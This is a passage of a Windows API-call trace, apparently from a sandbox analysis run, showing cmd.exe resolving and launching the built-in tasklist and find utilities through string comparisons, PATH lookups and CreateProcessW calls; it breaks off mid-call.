_String2="SET") returned 1 [0114.457] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0114.457] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0114.457] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0114.457] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0114.457] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0114.457] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0114.457] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0114.457] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0114.457] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0114.457] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0114.457] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0114.457] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0114.457] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0114.457] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0114.457] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0114.457] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0114.458] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0114.458] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0114.458] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0114.458] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0114.458] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0114.458] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0114.458] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0114.458] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0114.458] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0114.458] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0114.458] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0114.458] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0114.458] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0114.458] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0114.458] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0114.458] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0114.458] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0114.458] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0114.458] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0114.458] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0114.458] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0114.458] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0114.458] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0114.458] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0114.458] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0114.458] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0114.458] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0114.458] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0114.458] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0114.458] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0114.458] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0114.458] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0114.458] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0114.458] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0114.458] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0114.458] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0114.458] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0114.458] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0114.458] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0114.458] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0114.458] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0114.458] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0114.458] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0114.458] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0114.459] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0114.459] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0114.459] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0114.459] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0114.459] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0114.459] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0114.459] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0114.459] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0114.459] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0114.459] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0114.459] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0114.459] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0114.459] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0114.459] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0114.459] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0114.459] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0114.459] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0114.459] SetErrorMode (uMode=0x0) returned 0x0 [0114.459] SetErrorMode (uMode=0x1) returned 0x0 [0114.459] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe65228, lpFilePart=0xdafa0c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xdafa0c*="Desktop") returned 0x1c [0114.459] SetErrorMode (uMode=0x0) returned 0x1 [0114.459] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.459] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.463] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.464] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.464] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xdaf798, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf798) returned 0xffffffff [0114.464] GetLastError () returned 0x2 [0114.464] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.464] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xdaf798, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf798) returned 0xe65530 [0114.464] FindClose (in: hFindFile=0xe65530 | out: hFindFile=0xe65530) returned 1 [0114.464] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xdaf798, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf798) returned 0xffffffff [0114.464] GetLastError () returned 0x2 [0114.464] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xdaf798, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf798) returned 0xe65530 [0114.464] FindClose (in: hFindFile=0xe65530 | out: hFindFile=0xe65530) returned 1 [0114.464] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.464] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.464] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0114.464] SetErrorMode (uMode=0x0) returned 0x0 [0114.465] SetErrorMode (uMode=0x1) returned 0x0 [0114.465] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe6a3c0, lpFilePart=0xdaf7b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xdaf7b4*="Desktop") returned 0x1c [0114.465] SetErrorMode (uMode=0x0) returned 0x1 [0114.465] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.465] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.465] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.465] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.465] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xdaf540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf540) returned 0xffffffff [0114.465] GetLastError () returned 0x2 [0114.465] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.465] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xdaf540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf540) returned 0xe65628 [0114.465] FindClose (in: hFindFile=0xe65628 | out: hFindFile=0xe65628) returned 1 [0114.465] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xdaf540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf540) returned 0xffffffff [0114.465] GetLastError () returned 0x2 [0114.465] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xdaf540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf540) returned 0xe65628 [0114.465] FindClose (in: hFindFile=0xe65628 | out: hFindFile=0xe65628) returned 1 [0114.466] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.466] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.466] GetConsoleTitleW (in: lpConsoleTitle=0xdafa3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0114.466] InitializeProcThreadAttributeList (in: lpAttributeList=0xdaf968, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xdaf94c | out: lpAttributeList=0xdaf968, lpSize=0xdaf94c) returned 1 [0114.466] UpdateProcThreadAttribute (in: lpAttributeList=0xdaf968, dwFlags=0x0, Attribute=0x60001, lpValue=0xdaf954, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xdaf968, lpPreviousValue=0x0) returned 1 [0114.466] GetStartupInfoW (in: lpStartupInfo=0xdaf9a0 | out: lpStartupInfo=0xdaf9a0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x260, hStdError=0x2c)) [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.466] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.467] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.467] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0114.468] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xdaf8f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xdaf93c | out: lpCommandLine="tasklist", lpProcessInformation=0xdaf93c*(hProcess=0x64, hThread=0x60, dwProcessId=0xb5c, dwThreadId=0xb48)) returned 1 [0114.471] CloseHandle (hObject=0x60) returned 1 [0114.471] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0114.471] GetEnvironmentStringsW () returned 0xe642d8* [0114.471] FreeEnvironmentStringsA (penv="=") returned 1 [0114.471] DeleteProcThreadAttributeList (in: lpAttributeList=0xdaf968 | out: lpAttributeList=0xdaf968) [0114.471] _get_osfhandle (_FileHandle=3) returned 0x54 [0114.471] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0114.471] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0114.471] _close (_FileHandle=5) returned 0 [0114.471] _dup (_FileHandle=0) returned 4 [0114.471] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0114.471] _close (_FileHandle=3) returned 0 [0114.471] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0114.471] SetErrorMode (uMode=0x0) returned 0x0 [0114.471] SetErrorMode (uMode=0x1) returned 0x0 [0114.471] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe642e0, lpFilePart=0xdafa0c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xdafa0c*="Desktop") returned 0x1c [0114.471] SetErrorMode (uMode=0x0) returned 0x1 [0114.472] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.472] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.472] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.472] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.472] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xdaf798, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf798) returned 0xffffffff [0114.472] GetLastError () returned 0x2 [0114.472] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.472] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xdaf798, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf798) returned 0xe65628 [0114.472] FindClose (in: hFindFile=0xe65628 | out: hFindFile=0xe65628) returned 1 [0114.472] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xdaf798, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf798) returned 0xffffffff [0114.472] GetLastError () returned 0x2 [0114.472] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xdaf798, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf798) returned 0xe65628 [0114.472] FindClose (in: hFindFile=0xe65628 | out: hFindFile=0xe65628) returned 1 [0114.472] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.472] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.473] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0114.473] SetErrorMode (uMode=0x0) returned 0x0 [0114.473] SetErrorMode (uMode=0x1) returned 0x0 [0114.473] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe64668, lpFilePart=0xdaf7b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xdaf7b4*="Desktop") returned 0x1c [0114.473] SetErrorMode (uMode=0x0) returned 0x1 [0114.473] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.473] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.473] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.473] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.473] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xdaf540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf540) returned 0xffffffff [0114.473] GetLastError () returned 0x2 [0114.473] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xdaf540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf540) returned 0xe604a0 [0114.473] FindClose (in: hFindFile=0xe604a0 | out: hFindFile=0xe604a0) returned 1 [0114.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xdaf540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf540) returned 0xffffffff [0114.474] GetLastError () returned 0x2 [0114.474] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xdaf540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdaf540) returned 0xe604a0 [0114.474] FindClose (in: hFindFile=0xe604a0 | out: hFindFile=0xe604a0) returned 1 [0114.474] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.474] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.474] GetConsoleTitleW (in: lpConsoleTitle=0xdafa3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0114.474] InitializeProcThreadAttributeList (in: lpAttributeList=0xdaf968, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xdaf94c | out: lpAttributeList=0xdaf968, lpSize=0xdaf94c) returned 1 [0114.474] UpdateProcThreadAttribute (in: lpAttributeList=0xdaf968, dwFlags=0x0, Attribute=0x60001, lpValue=0xdaf954, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xdaf968, lpPreviousValue=0x0) returned 1 [0114.474] GetStartupInfoW (in: lpStartupInfo=0xdaf9a0 | out: lpStartupInfo=0xdaf9a0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x260, hStdError=0x2c)) [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.475] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.475] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0114.475] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", 